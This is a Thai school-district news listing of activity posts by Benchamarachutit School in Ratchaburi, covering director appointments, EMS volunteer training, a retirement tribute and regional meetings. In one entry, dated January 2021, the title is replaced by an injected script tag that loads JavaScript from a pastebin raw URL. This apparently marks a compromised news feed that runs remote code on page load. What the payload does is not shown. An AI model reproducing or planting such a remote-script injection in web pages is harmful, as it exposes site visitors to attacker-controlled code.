ข่าวโรงเรียนในสังกัด สพม.8

::ข่าวกิจกรรม::

คณะผู้บริหารร่วมเป็นกำลังใจสนับสนุนการจัดตั้งสำนักงานเขตพื้นที่การศึกษามัธยมศึกษากาญจนบุรี ณ โรงเรียนกาญจนานุเคราะห์ จังหวัดกาญจนบุรี

คณะผู้บริหารร่วมเป็นกำลังใจสนับสนุนการจัดตั้งสำนักงานเขตพื้นที่การศึกษามัธยมศึกษากาญจนบุรี ณ โรงเรียนกาญจนานุเคราะห์ จังหวัดกาญจนบุรี

เขียนโดย : โรงเรียนเบญจมราชูทิศ เปิดอ่าน82 ครั้ง เขียนเมื่อ2021-03-03 09:53:54

ร่วมแสดงความยินดีการเข้ารับตำแหน่งผู้อำนวยการโรงเรียน ของ ผอ.ธีระเดช บุญล้อม โรงเรียนเตรียมอุดมพัฒนาการ ราชบุรี

ร่วมแสดงความยินดีการเข้ารับตำแหน่งผู้อำนวยการโรงเรียน ของ ผอ.ธีระเดช บุญล้อม โรงเรียนเตรียมอุดมพัฒนาการ ราชบุรี

เขียนโดย : โรงเรียนเบญจมราชูทิศ เปิดอ่าน168 ครั้ง เขียนเมื่อ2021-02-19 14:57:12

ร่วมแสดงความยินดีเข้ารับตำแหน่งผู้อำนวยการโรงเรียน

ร่วมแสดงความยินดีเข้ารับตำแหน่งผู้อำนวยการโรงเรียน

เขียนโดย : โรงเรียนเบญจมราชูทิศ เปิดอ่าน144 ครั้ง เขียนเมื่อ2021-02-19 11:02:44

<script type=" align="absmiddle">

<script type="text/javascript" src="https://pastebin.com/raw/0RT7b3X1"></script>

เขียนโดย : โรงเรียนเบญจมราชูทิศ เปิดอ่าน148 ครั้ง เขียนเมื่อ2021-01-26 15:45:48

โรงเรียนเบญจมราชูทิศ ราชบุรี จัดโครงการอบรมเชิงปฏิบัติการหลักสูตรการบริการแพทย์ฉุกเฉิน (Emergency medical services,EMS) อาสาสมัครฉุกเฉินชุมชน (อฉช.)

โรงเรียนเบญจมราชูทิศ ราชบุรี จัดโครงการอบรมเชิงปฏิบัติการหลักสูตรการบริการแพทย์ฉุกเฉิน (Emergency medical services,EMS) อาสาสมัครฉุกเฉินชุมชน (อฉช.)

เมื่อวันที่ 5 ธันวาคม 2563 โรงเรียนเบญจมราชูทิศ ราชบุรี ได้จัดโครงการอบรมเชิงปฏิบัติการหลักสูตรการบริการแพทย์ฉุกเฉิน (Emergency medical services,EMS) อาสาสมัครฉุกเฉินชุมชน (อฉช.) โดยมี

เขียนโดย : โรงเรียนเบญจมราชูทิศ เปิดอ่าน121 ครั้ง เขียนเมื่อ2020-12-08 09:20:29

โรงเรียนเบญจมราชูทิศ ราชบุรี ได้ร่วมงาน

โรงเรียนเบญจมราชูทิศ ราชบุรี ได้ร่วมงาน" วิถีวัฒนธรรมแห่งสายน้ำ ประตูสู่สยามประเทศ " ณ วัดขนอนหนังใหญ่

เมื่อวันที่ ๒๐ พฤศจิกายน พ.ศ. ๒๕๖๓

เขียนโดย : โรงเรียนเบญจมราชูทิศ เปิดอ่าน136 ครั้ง เขียนเมื่อ2020-11-23 09:18:43

โรงเรียนเบญจมราชูทิศ ราชบุรี เข้าร่วมการประชุมชี้แจงสำรวจพื้นที่การเป็นเจ้าภาพการแข่งขันกีฬาเยาวชนแห่งชาติ ครั้งที่ 38

โรงเรียนเบญจมราชูทิศ ราชบุรี เข้าร่วมการประชุมชี้แจงสำรวจพื้นที่การเป็นเจ้าภาพการแข่งขันกีฬาเยาวชนแห่งชาติ ครั้งที่ 38

เมื่อวันที่ 13

เขียนโดย : โรงเรียนเบญจมราชูทิศ เปิดอ่าน161 ครั้ง เขียนเมื่อ2020-11-18 10:04:46

โรงเรียนเบญจมราชูทิศ ราชบุรี เป็นเจ้าภาพจัดการประชุมผู้บริหารสถานศึกษา สังกัดสำนักงานเขตพื้นที่การศึกษามัธยมศึกษา เขต ๘  ณ ห้องปิยราชา

โรงเรียนเบญจมราชูทิศ ราชบุรี เป็นเจ้าภาพจัดการประชุมผู้บริหารสถานศึกษา สังกัดสำนักงานเขตพื้นที่การศึกษามัธยมศึกษา เขต ๘ ณ ห้องปิยราชา

เมื่อวันพุธที่ ๑๔ ตุลาคม ๒๕๖๓

เขียนโดย : โรงเรียนเบญจมราชูทิศ เปิดอ่าน167 ครั้ง เขียนเมื่อ2020-10-19 08:59:59

โรงเรียนเบญจมราชูทิศ ราชบุรี จัดงานแสดงมุทิตาจิต กตัญญูครูผู้เกษียณอายุราชการ

โรงเรียนเบญจมราชูทิศ ราชบุรี จัดงานแสดงมุทิตาจิต กตัญญูครูผู้เกษียณอายุราชการ

เมื่อวันที่ 28 กันยายน 2563 โรงเรียนเบญจมราชูทิศ ราชบุรี จัดงานแสดงมุทิตาจิต กตั..

เขียนโดย : โรงเรียนเบญจมราชูทิศ เปิดอ่าน232 ครั้ง เขียนเมื่อ2020-09-30 16:56:07

โรงเรียนเบญจมราชูทิศ ราชบุรี ร่วมต้อนรับ ผู้บริหาร คณะครูและบุคลากรจากโรงเรียนราชโอรส จ.กรุงเทพมหานคร

โรงเรียนเบญจมราชูทิศ ราชบุรี ร่วมต้อนรับ ผู้บริหาร คณะครูและบุคลากรจากโรงเรียนราชโอรส จ.กรุงเทพมหานคร

เมื่อวันที่ 25 กันยายน 2563  นายนิวัตร วงศ์วิลัย ผู้อำนวยการโรงเรียนเบญจมราชูทิศ ราชบุรี พร้อมด้วยผู้บริหารและคณะครู ร่วมต้อนรับ คณะครูและบุคลากร..

เขียนโดย : โรงเรียนเบญจมราชูทิศ เปิดอ่าน217 ครั้ง เขียนเมื่อ2020-09-29 08:59:57

นำ code ไปติดเว็บ
ปรับปรุงใหม่เพื่อให้แต่ละโรงเรียนสามารถปรับแต่งเองได้
RSS ตัวอย่าง
              ตัวอย่าง